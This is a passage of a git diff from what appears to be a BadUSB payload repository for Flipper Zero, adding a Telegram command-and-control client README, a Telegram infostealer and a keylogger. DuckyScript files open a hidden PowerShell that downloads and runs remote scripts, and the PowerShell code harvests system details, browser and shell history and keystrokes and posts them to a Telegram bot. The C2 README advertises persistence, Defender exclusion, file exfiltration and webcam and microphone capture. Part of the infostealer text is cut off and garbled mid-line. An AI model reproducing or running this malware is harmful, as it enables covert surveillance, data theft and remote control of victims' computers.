Inv`o`ke-`W`ebR`e`qu`e`st -Uri "$i" -ErrorAction Stop + $StatusCode = $Response.StatusCode +}catch{$StatusCode = $_.Exception.Response.StatusCode.value__} +if ($StatusCode -eq "200"){ + Add-OutputBoxLine -outfeed "Found one: $i$userhandle" +}if ($StatusCode -eq "404"){}else {}} + +}) + + + +$MainWindow.ShowDialog() | Out-Null +exit \ No newline at end of file diff --git a/Telegram-C2/README.md b/Telegram-C2/README.md new file mode 100644 index 0000000..9e65ce3 --- /dev/null +++ b/Telegram-C2/README.md @@ -0,0 +1,151 @@ +# Beigeworm's Telegram C2 Client + +MAIN SCRIPT HERE - https://github.com/beigeworm/PoshGram-C2 + +**SYNOPSIS** +------------- + +Using a Telegram Bot's Chat to Act as a Command and Control Server. + +Telegram Bots are able to both receive AND send messages. so can you use it as a C2 Server? + +----------------------------------------------------------------------------------------------------------------------------- + +**INFORMATION** +--------------- + +This script will wait until it is called in the Telegram chat by it's host computer name (eg. DESKTOP-WG65HY). Then Click 'Enter Commands' or 'Options' to begin the session and accept commands from Telegram chat. + +During a connected session, A list of Modules can be accessed by typing 'options' in chat. Or you can use the chat to act simply as a reverse shell with standard PowerShell commands. + +----------------------------------------------------------------------------------------------------------------------------- + +Confirmed working with no Microsoft AV detections, on a variety of Windows systems over a week or so of testing 14/08/23 + +*(Win 10 Laptop, Win 11 Laptop, 2 Win 11 Desktops, 2 Win10 Desktops, Win 10 VM, AtlasOS Win 10 Laptop. ReviOS Win 10 Macbook w/ Bootcamp) will add more in future...* + +----------------------------------------------------------------------------------------------------------------------------- + +**FEATURES** +------------- + +**Session Queue** - While running, this script waits for a start phrase (the computer name) before connecting, allowing multiple computers to wait for interaction. + +**Botnet Mode** - Add simultaneous sessions to control multiple computers at once. (enter computer names one after the other into chat) + +**Persistance** - Can add itself to startup folder (RemovePersistance command will undo this) + +**Auto Update** - The script checks for a newer version and updates if neccecary. + +**Options List** - Once connected type "Options" to see a list of operations. ("ExtraInfo" will show more command info) + +**Pause Session** - exits the current session and script waits for re-authrentication. + +**Key Capture Standby** - only sends messages if keys are pressed and remains idle otherwise. + +**File Size Intellegence** - Auto split Uploads over 50mb. + +**Privilege Escalation** - The ability to send the user a UAC prompt for this script and restart if succesful. + +**Toggle Error Messaging** - Turn On or Off returning error messages to the chat. (Off by default) + +**Reverse shell** - apart from running the modules, once connected the chat can act as a reverse shell. + +**Killswitch** - Any Modules such as "KeyCapture" and "Exfiltrate" can be killed by typing "KILL" into chat + (this returns the session so it can accept further commands (does not kill the current session.)) + +----------------------------------------------------------------------------------------------------------------------------- + +**TELEGRAM SETUP INSTRUCTIONS** +---------------------- + 1. Install Telegram and make an account if you haven't already. + + 2. Visit https://t.me/botfather and make a bot. (make a note of the API token) + + 3. Click the provided link to open the chat E.G. "t.me/****bot" then type or click /start) + + 4. At the start off the the Script - Replace `$tg` with your Telegram Bot API Token (only when running ps1 directly (not changed using Flipper, VBScript etc as it should be pre-defined there.. eg. `$tg = 'TOKEN'`)) + + 5. Run the script on target system + + 6. Check telegram chat for 'waiting to connect' message. + + 7. This script has a feature to wait until you start the session from Telegram. + + 8. Type the computer name from the 'waiting' message into Telegram bot chat to connect to that computer's session. + +----------------------------------------------------------------------------------------------------------------------------- + +**MODULES INFORMATION** +----------------------- + +`Options` : Show a menu in chat listing all the below functions + +`Kill` : Killswitch for `Key-Capture` and `Exfiltrate` commands (can take a few seconds to kill.) + +`Extra-Info` : Extra command information and examples sent to the chat + +`Close` : Close the Session completely + +`Pause-Session` : Pauses the session (to reconnect type in the computer name again) + +`Toggle-Errors` : Toggle error messages to the chat ON or OFF and returns the current state to chat + +`Folder-Tree` : Gets Directory trees for User folders and sends it zipped to the chat + +`SpeechToText` : Send audio transcript to Discord + +`Screenshot` : Sends a screenshot of the desktop as a png file + +`Key-capture` : Capture Keystrokes and send them (collected keystrokes are only sent after 10 seconds of keyboard inactivity) + +`System-info` : Send System info as text file (system, user, hardware, ip information and more) + +`Enumerate-LAN` : find info on other network devices (IPv4, MAC address, Hostname, Manufacturer) (eg. `Enumerate-LAN -prefix 192.168.1`) + +`Add-Persistance` : Add Telegram C2 to Startup (Copy the script to a default windows location and a vbs script to the startup folder) + +`Remove-Persistance` : Remove Startup Persistance (Remove the ps1 script and vbs file) + +`Is-Admin` : Checks if session has admin Privileges and returns the result + +`Attempt-Elevate` : Send user a prompt to grant Administrator privilages in a new session. (if the user accepts the prompt) + +`Message` : Send a message in a pop-up window to connected computer `Message "Your Message Here!"` + +`Take-Picture` : Take a picture with any connected camera/webcam and upload to chat. + +`Record-Audio` : Record microphone to mp3 file and upload to chat. eg. `Record-Audio -t 100` in seconds + +`Record-Screen` : Record Screen to mkv file and upload to chat. eg. `Record-Screen -t 100` in seconds + +`Nearby-Wifi` : Show nearby wifi networks + +`Send-Hydra` : Never ending popups (use killswitch) + +`Exfiltrate` : Searches for, and sends, files to the chat as zip files split into 50mb each (Telegram max upload limit.) + + EXFILTRATION EXAMPLE COMMAND = `Exfiltrate -path [FOLDERS] -filetype [FILETYPES]` + + FOLDERS = Documents, Desktop, Downloads, OneDrive, Pictures, Videos + + FILETYPES = log, db, txt, doc, pdf, jpg, jpeg, png, wdoc, xdoc, cer, key, xls, xlsx, cfg, conf, docx, rft + +**ADMIN ONLY FUNCTIONS** + +`Disable-AV` : Attempt to exclude C:/ from Defender Scanning (Crude disable method) + +`Disable-HID` : Disable Mice and Keyboards on the target system + +`Enable-HID` : Enable Mice and Keyboards on the target system + +*(Commands are not case sensitive)* + +----------------------------------------------------------------------------------------------------------------------------- + +Builder GUI example + + +Telegram Chat example + +o 'kill' to stop 'KeyCapture' or 'Exfiltrate' command and return to waiting for commands. \ No newline at end of file diff --git a/Telegram-C2/Telegram C2 Client.txt b/Telegram-C2/Telegram C2 Client.txt new file mode 100644 index 0000000..bc7fb34 --- /dev/null +++ b/Telegram-C2/Telegram C2 Client.txt @@ -0,0 +1,27 @@ + +REM Title: beigeworm's Telegram Command And Control. +REM Author: @beigeworm +REM Description: Using a Telegram Bot's Chat to Act as a Command and Control Platform. +REM Target: Windows 10 and 11 + +REM SETUP INSTRUCTIONS +REM 1. visit https://t.me/botfather and make a bot. +REM 2. add bot api to script. +REM 3. search for bot in top left box in telegram and start a chat then type /start. +REM 5. Run Script on target System +REM 6. Check telegram chat for 'waiting to connect' message. +REM 7. this script has a feature to wait until you start the session from telegram. +REM 8. type in the computer name from that message into telegram bot chat to connect to that computer. +REM 9. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Token + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NonI -NoP -Ep Bypass -C $tg='TELEGRAM_BOT_API_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1 | iex +ENTER + + diff --git a/Telegram-Infostealer/README.md b/Telegram-Infostealer/README.md new file mode 100644 index 0000000..5056d54 --- /dev/null +++ b/Telegram-Infostealer/README.md @@ -0,0 +1,14 @@ + +Telegram System InfoStealer
+ +SYNOPSIS + +This script gathers system information and posts to Telegram Bot Chat with the results. + +SETUP INSTRUCTIONS + +1. visit https://t.me/botfather and make a bot. +2. add bot api to script. +3. search for bot in top left box in telegram and start a chat then type /start. +4. Replace YOUR_BOT_TOKEN_FOR_TELEGRAM with your bot token +5. Run Script on target System diff --git a/Telegram-Infostealer/System-Info-to-Telegram.txt b/Telegram-Infostealer/System-Info-to-Telegram.txt new file mode 100644 index 0000000..0a5279c --- /dev/null +++ b/Telegram-Infostealer/System-Info-to-Telegram.txt @@ -0,0 +1,19 @@ + +REM Title: beigeworm's system information to Telegram Bot +REM Author: @beigeworm +REM Description: This script gathers system information and posts to Telegram Bot Chat with the results. +REM Target: Windows 10 + +REM *SETUP* +REM replace BOT_TOKEN with your Telegram bot token. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Telegram-Infostealer/main.ps1 | iex +ENTER + diff --git a/Telegram-Infostealer/main.ps1 b/Telegram-Infostealer/main.ps1 new file mode 100644 index 0000000..6ff8467 --- /dev/null +++ b/Telegram-Infostealer/main.ps1 @@ -0,0 +1,95 @@ +$token= "$tg" +$apiUrl = "https://api.telegram.org/bot$Token/sendMessage" +$URL = 'https://api.telegram.org/bot{0}' -f $Token + +while($chatID.length -eq 0){ + $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") + if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] + if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} + Sleep 10 +} + +$charCodes = @(0x2705, 0x1F4BB, 0x274C, 0x1F55C, 0x1F50D, 0x1F517, 0x23F8) +$chars = $charCodes | ForEach-Object { [char]::ConvertFromUtf32($_) } +$tick, $comp, $closed, $waiting, $glass, $cmde, $pause = $chars +Function Post-Message{$script:params = @{chat_id = $ChatID ;text = $contents};Invoke-RestMethod -Uri $apiUrl -Method POST -Body $params} +Function Post-File{curl.exe -F chat_id="$ChatID" -F document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument" | Out-Null} + + +$contents = "$comp Gathering System Information for $env:COMPUTERNAME $comp" +Post-Message +$userInfo = Get-WmiObject -Class Win32_UserAccount ;$fullName = $($userInfo.FullName) ;$fullName = ("$fullName").TrimStart("") +$email = (Get-ComputerInfo).WindowsRegisteredOwner +$systemLocale = Get-WinSystemLocale;$systemLanguage = $systemLocale.Name +$userLanguageList = Get-WinUserLanguageList;$keyboardLayoutID = $userLanguageList[0].InputMethodTips[0] +$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content +$systemInfo = Get-WmiObject -Class Win32_OperatingSystem +$ver = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').DisplayVersion +$processorInfo = Get-WmiObject -Class Win32_Processor +$computerSystemInfo = Get-WmiObject -Class Win32_ComputerSystem +$userInfo = Get-WmiObject -Class Win32_UserAccount +$videocardinfo = Get-WmiObject Win32_VideoController +$Hddinfo = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, FileSystem,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,FileSystem,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } ;$Hddinfo=($Hddinfo| Out-String) ;$Hddinfo = ("$Hddinfo").TrimEnd("") +$RamInfo = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} +$users = "$($userInfo.Name)" +$userString = "`nFull Name : $($userInfo.FullName)" +$OSString = "$($systemInfo.Caption) $($systemInfo.OSArchitecture)" +$systemString = "Processor : $($processorInfo.Name)" +$systemString += "`nMemory : $RamInfo" +$systemString += "`nGpu : $($videocardinfo.Name)" +$systemString += "`nStorage : $Hddinfo" +$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table +$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine +$service=Get-CimInstance -ClassName Win32_Service | select State,Name,StartName,PathName | Where-Object {$_.State -like 'Running'} +$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize +$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion +$Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" +$Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique +$Value | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}} +$Regex2 = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Pathed = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History" +$Value2 = Get-Content -Path $Pathed | Select-String -AllMatches $regex2 |% {($_.Matches).Value} |Sort -Unique +$Value2 | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}} +$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt";$pshistory = Get-Content $pshist -raw +$FilePath = "$env:temp\systeminfo.txt" +$outssid="";$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+";foreach($s in $ws){ +if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "Keylogger To Telegram Chat
+ +SYNOPSIS + +This script connects target computer with a telegram chat to capture keystrokes. + +SETUP INSTRUCTIONS + +1. visit https://t.me/botfather and make a bot. +2. add bot api to script. +3. search for bot in top left box in telegram and start a chat then type /start. +5. Run Script on target System diff --git a/Telegram-Keylogger/main.ps1 b/Telegram-Keylogger/main.ps1 new file mode 100644 index 0000000..738cd2b --- /dev/null +++ b/Telegram-Keylogger/main.ps1 @@ -0,0 +1,56 @@ +$Token = "$tg" +$PassPhrase = "$env:COMPUTERNAME" +$URL='https://api.telegram.org/bot{0}' -f $Token +while($chatID.length -eq 0){ +$updates = Invoke-RestMethod -Uri ($url + "/getUpdates") +if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] +if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} +Sleep 10 +} + +Function KeyCapture { +$MessageToSend = New-Object psobject +$MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID +$MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : KeyCapture Started." -Force +irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" +$API = '[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int GetKeyboardState(byte[] keystate);[DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int MapVirtualKey(uint uCode, int uMapType);[DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);' +$API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru +$LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew() +$KeypressThreshold = [TimeSpan]::FromSeconds(10) +While ($true){ +$keyPressed = $false +try{ +while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) { +Start-Sleep -Milliseconds 30 +for ($asc = 8; $asc -le 254; $asc++){ +$keyst = $API::GetAsyncKeyState($asc) +if ($keyst -eq -32767) { +$keyPressed = $true +$LastKeypressTime.Restart() +$null = [console]::CapsLock +$vtkey = $API::MapVirtualKey($asc, 3) +$kbst = New-Object Byte[] 256 +$checkkbst = $API::GetKeyboardState($kbst) +$logchar = New-Object -TypeName System.Text.StringBuilder + if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) { + $LString = $logchar.ToString() + if ($asc -eq 8) {$LString = "[BKSP]"} + if ($asc -eq 13) {$LString = "[ENT]"} + if ($asc -eq 27) {$LString = "[ESC]"} + $nosave += $LString +}}}}} +finally{ +If ($keyPressed) { +$escmsgsys = $nosave -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} +$timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss" +$escmsg = "Keys Captured : "+$escmsgsys +$MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$escmsg" -Force +irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" +$keyPressed = $false +$nosave = "" +} +} +$LastKeypressTime.Restart() +Start-Sleep -Milliseconds 10 +} +} diff --git a/US-Keyboard-Layout/README.md b/US-Keyboard-Layout/README.md new file mode 100644 index 0000000..8bdf9a1 --- /dev/null +++ b/US-Keyboard-Layout/README.md @@ -0,0 +1,10 @@ + +Set US Keyboard Layout
+ +SYNOPSIS + +This script changes the keyboard layout and system language to US. + +USAGE + +1. Run the script on a target system \ No newline at end of file diff --git a/US-Keyboard-Layout/US-Keyboard.txt b/US-Keyboard-Layout/US-Keyboard.txt new file mode 100644 index 0000000..9479f31 --- /dev/null +++ b/US-Keyboard-Layout/US-Keyboard.txt @@ -0,0 +1,17 @@ +REM Title: beigeworm's Keyboard Language changer. +REM Author: @beigeworm +REM Description: This script changes the keyboard layout and system language to US. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/US-Keyboard-Layout/main.ps1 | iex +ENTER + + + diff --git a/US-Keyboard-Layout/main.ps1 b/US-Keyboard-Layout/main.ps1 new file mode 100644 index 0000000..88e777a --- /dev/null +++ b/US-Keyboard-Layout/main.ps1 @@ -0,0 +1,9 @@ +Function SetkbUS { + +Dism /online /Get-Intl +Set-WinSystemLocale en-US +Set-WinUserLanguageList en-US -force + +} + +SetkbUS diff --git a/Wallpaper-Jumpscare/README.md b/Wallpaper-Jumpscare/README.md new file mode 100644 index 0000000..0f433d5 --- /dev/null +++ b/Wallpaper-Jumpscare/README.md @@ -0,0 +1,11 @@ + +Simple Wallpaper Changer
+ +SYNOPSIS + +This script will download an image from the web and set it as the wallpaper. + +USAGE + +1. Change DIRECT IMAGE LINK HERE to your URL. +2. Run the script. diff --git a/Wallpaper-Jumpscare/Wallpaper-Jumpscare.txt b/Wallpaper-Jumpscare/Wallpaper-Jumpscare.txt new file mode 100644 index 0000000..4df4aaa --- /dev/null +++ b/Wallpaper-Jumpscare/Wallpaper-Jumpscare.txt @@ -0,0 +1,18 @@ +REM Title: beigeworm's Wallpaper Jump Scare. +REM Author: @beigeworm +REM Description: This script changes downlaods a scary image and sets it as a wallpaper. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Wallpaper-Jumpscare/main.ps1 + | iex +CTRL-SHIFT ENTER +DELAY 3000 +ALT y + diff --git a/Wallpaper-Jumpscare/main.ps1 b/Wallpaper-Jumpscare/main.ps1 new file mode 100644 index 0000000..c0126e2 --- /dev/null +++ b/Wallpaper-Jumpscare/main.ps1 @@ -0,0 +1,23 @@ +$url = "https://i.ibb.co/XJSPt9s/1.png" +$outputPath = "$env:temp\img.jpg" +$wallpaperStyle = 2 # 0: Tiled, 1: Centered, 2: Stretched + +IWR -Uri $url -OutFile $outputPath + +$signature = @' +using System; +using System.Runtime.InteropServices; + +public class Wallpaper { + [DllImport("user32.dll", CharSet = CharSet.Auto)] + public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); +} +'@ + +Add-Type -TypeDefinition $signature + +$SPI_SETDESKWALLPAPER = 0x0014 +$SPIF_UPDATEINIFILE = 0x01 +$SPIF_SENDCHANGE = 0x02 + +[Wallpaper]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $outputPath, $SPIF_UPDATEINIFILE -bor $SPIF_SENDCHANGE) diff --git a/Webhook-Spammer-GUI/README.md b/Webhook-Spammer-GUI/README.md new file mode 100644 index 0000000..9ed763b --- /dev/null +++ b/Webhook-Spammer-GUI/README.md @@ -0,0 +1,12 @@ + +Discord Spammer With GUI
+ +SYNOPSIS + +Creates a GUI with functionality to spam a webhook with text or an image. + +USAGE + +1. Run script with powershell +2. Input ip Range and select additional parameters +3. Press "Start Scan" diff --git a/Webhook-Spammer-GUI/Webhook-Spammer-GUI.txt b/Webhook-Spammer-GUI/Webhook-Spammer-GUI.txt new file mode 100644 index 0000000..f8df221 --- /dev/null +++ b/Webhook-Spammer-GUI/Webhook-Spammer-GUI.txt @@ -0,0 +1,16 @@ +REM Title: beigeworm's Webhook Spammer GUI Tool. +REM Author: @beigeworm +REM Description: This script creates a GUI for Spamming a webhook with text or an image. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Webhook-Spammer-GUI/main.ps1 | iex +ENTER + + diff --git a/Webhook-Spammer-GUI/main.ps1 b/Webhook-Spammer-GUI/main.ps1 new file mode 100644 index 0000000..da83765 --- /dev/null +++ b/Webhook-Spammer-GUI/main.ps1 @@ -0,0 +1,215 @@ +Add-Type -AssemblyName System.Windows.Forms +Add-Type -AssemblyName System.Drawing +Add-Type -AssemblyName Microsoft.VisualBasic +[System.Windows.Forms.Application]::EnableVisualStyles() + +$tooltip1 = New-Object System.Windows.Forms.ToolTip +$ShowHelp={ + Switch ($this.name) { + + + "start" {$tip = "Start Spamming!"} + + "image" {$tip = "Select an Image"} + + "url" {$tip = "Input Discord Webhook URL"} + + "message" {$tip = "Input Message Here"} + + "imgpath" {$tip = "Path to your Image"} + + "delay" {$tip = "Delay Between Sending"} + + "amount" {$tip = "Amount of Messages to Send"} +} +$tooltip1.SetToolTip($this,$tip) +} + +$MainWindow = New-Object System.Windows.Forms.Form +$MainWindow.ClientSize = '435,300' +$MainWindow.Text = "| BeigeTools | Webhook Spammer |" +$MainWindow.BackColor = "#242424" +$MainWindow.Opacity = 1 +$MainWindow.TopMost = $true +$MainWindow.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\DevicePairingWizard.exe") + +$StartSpam = New-Object System.Windows.Forms.Button +$StartSpam.Text = "Start" +$StartSpam.Width = 80 +$StartSpam.Height = 25 +$StartSpam.Location = New-Object System.Drawing.Point(340, 263) +$StartSpam.Font = 'Microsoft Sans Serif,8,style=Bold' +$StartSpam.BackColor = "#eeeeee" +$StartSpam.add_MouseHover($showhelp) +$StartSpam.name="start" + +$selimage = New-Object System.Windows.Forms.Button +$selimage.Text = "Browse" +$selimage.Width = 80 +$selimage.Height = 25 +$selimage.Location = New-Object System.Drawing.Point(245, 263) +$selimage.Font = 'Microsoft Sans Serif,8,style=Bold' +$selimage.BackColor = "#eeeeee" +$selimage.add_MouseHover($showhelp) +$selimage.name="image" + +$URLboxInputHeader = New-Object System.Windows.Forms.Label +$URLboxInputHeader.Text = "Discord Webhook URL" +$URLboxInputHeader.ForeColor = "#bcbcbc" +$URLboxInputHeader.AutoSize = $true +$URLboxInputHeader.Width = 25 +$URLboxInputHeader.Height = 10 +$URLboxInputHeader.Location = New-Object System.Drawing.Point(15, 15) +$URLboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' + +$URLboxInput = New-Object System.Windows.Forms.TextBox +$URLboxInput.Location = New-Object System.Drawing.Point(20, 35) +$URLboxInput.BackColor = "#eeeeee" +$URLboxInput.Width = 400 +$URLboxInput.Height = 40 +$URLboxInput.Text = "https://discord.com/api/webhooks/..." +$URLboxInput.Multiline = $false +$URLboxInput.Font = 'Microsoft Sans Serif,8,style=Bold' +$URLboxInput.add_MouseHover($showhelp) +$URLboxInput.name="url" + +$TextboxInputHeader = New-Object System.Windows.Forms.Label +$TextboxInputHeader.Text = "Message Content" +$TextboxInputHeader.ForeColor = "#bcbcbc" +$TextboxInputHeader.AutoSize = $true +$TextboxInputHeader.Width = 25 +$TextboxInputHeader.Height = 10 +$TextboxInputHeader.Location = New-Object System.Drawing.Point(15, 63) +$TextboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' + +$TextBoxInput = New-Object System.Windows.Forms.TextBox +$TextBoxInput.Location = New-Object System.Drawing.Point(20, 83) +$TextBoxInput.BackColor = "#eeeeee" +$TextBoxInput.Width = 400 +$TextBoxInput.Height = 110 +$TextBoxInput.Text = "" +$TextBoxInput.Multiline = $true +$TextBoxInput.Font = 'Microsoft Sans Serif,8,style=Bold' +$TextBoxInput.add_MouseHover($showhelp) +$TextBoxInput.name="message" + +$ImageInputHeader = New-Object System.Windows.Forms.Label +$ImageInputHeader.Text = "Image Path" +$ImageInputHeader.ForeColor = "#bcbcbc" +$ImageInputHeader.AutoSize = $true +$ImageInputHeader.Width = 25 +$ImageInputHeader.Height = 10 +$ImageInputHeader.Location = New-Object System.Drawing.Point(15, 200) +$ImageInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' + +$ImageInput = New-Object System.Windows.Forms.TextBox +$ImageInput.Location = New-Object System.Drawing.Point(20, 220) +$ImageInput.BackColor = "#eeeeee" +$ImageInput.Width = 400 +$ImageInput.Height = 20 +$ImageInput.Text = "" +$ImageInput.Multiline = $true +$ImageInput.Font = 'Microsoft Sans Serif,8,style=Bold' +$ImageInput.add_MouseHover($showhelp) +$ImageInput.name="imgpath" + +$coolboxInputHeader = New-Object System.Windows.Forms.Label +$coolboxInputHeader.Text = "Cooldown" +$coolboxInputHeader.ForeColor = "#bcbcbc" +$coolboxInputHeader.AutoSize = $true +$coolboxInputHeader.Width = 25 +$coolboxInputHeader.Height = 10 +$coolboxInputHeader.Location = New-Object System.Drawing.Point(115, 245) +$coolboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' + +$coolboxInput = New-Object System.Windows.Forms.TextBox +$coolboxInput.Location = New-Object System.Drawing.Point(120, 265) +$coolboxInput.BackColor = "#eeeeee" +$coolboxInput.Width = 60 +$coolboxInput.Height = 40 +$coolboxInput.Text = "700" +$coolboxInput.Multiline = $false +$coolboxInput.Font = 'Microsoft Sans Serif,8,style=Bold' +$coolboxInput.add_MouseHover($showhelp) +$coolboxInput.name="delay" + +$amtboxInputHeader = New-Object System.Windows.Forms.Label +$amtboxInputHeader.Text = "Amount" +$amtboxInputHeader.ForeColor = "#bcbcbc" +$amtboxInputHeader.AutoSize = $true +$amtboxInputHeader.Width = 25 +$amtboxInputHeader.Height = 10 +$amtboxInputHeader.Location = New-Object System.Drawing.Point(15, 245) +$amtboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' + +$amtBoxInput = New-Object System.Windows.Forms.TextBox +$amtBoxInput.Location = New-Object System.Drawing.Point(20, 265) +$amtBoxInput.BackColor = "#eeeeee" +$amtBoxInput.Width = 60 +$amtBoxInput.Height = 40 +$amtBoxInput.Text = "100" +$amtBoxInput.Multiline = $false +$amtBoxInput.Font = 'Microsoft Sans Serif,8,style=Bold' +$amtBoxInput.add_MouseHover($showhelp) +$amtBoxInput.name="amount" + +$mstext = New-Object System.Windows.Forms.Label +$mstext.Text = "ms" +$mstext.ForeColor = "#bcbcbc" +$mstext.AutoSize = $true +$mstext.Width = 25 +$mstext.Height = 10 +$mstext.Location = New-Object System.Drawing.Point(185, 268) +$mstext.Font = 'Microsoft Sans Serif,8,style=Bold' + +#==================================================== Define GUI Elements ========================================================== + +$MainWindow.controls.AddRange(@($StartSpam, $ImageInput, $ImageInputHeader, $selimage, $URLBoxInput, $URLBoxInputHeader, $TextBoxInput, $coolboxInput, $amtBoxInput, $TextboxInputHeader, $coolboxInputHeader, $amtboxInputHeader, $mstext)) + +#==================================================== Click Functions ========================================================== + +$StartSpam.Add_Click({ + +$hookurl = $URLBoxInput.Text +$n = [int]$amtBoxInput.Text +$c = [int]$coolBoxInput.Text +$i = 0 + +while($i -lt $n) { +$msgsys = $TextboxInput.Text +$escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} +$jsonsys = @{"username" = "Spammer" ;"content" = $escmsgsys} | ConvertTo-Json +Start-Sleep -Milliseconds $c +Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys +$i++ +} + +$imageBytes = [System.IO.File]::ReadAllBytes($ImageInput.Text) +$b64 = [System.Convert]::ToBase64String($imageBytes) +$decodedFile = [System.Convert]::FromBase64String($b64) +$File = "$env:temp\bl.png" +Set-Content -Path $File -Value $decodedFile -Encoding Byte + +while($i -lt $n) { +curl.exe -F "file1=@$file" $hookurl +$i++ +} + +Remove-Item -Path $file -Force +}) + + +$selimage.Add_Click({ + +$FileDialog = New-Object Windows.Forms.OpenFileDialog +$FileDialog.Filter = "All Files (*.*)|*.*" + +if ($FileDialog.ShowDialog() -eq 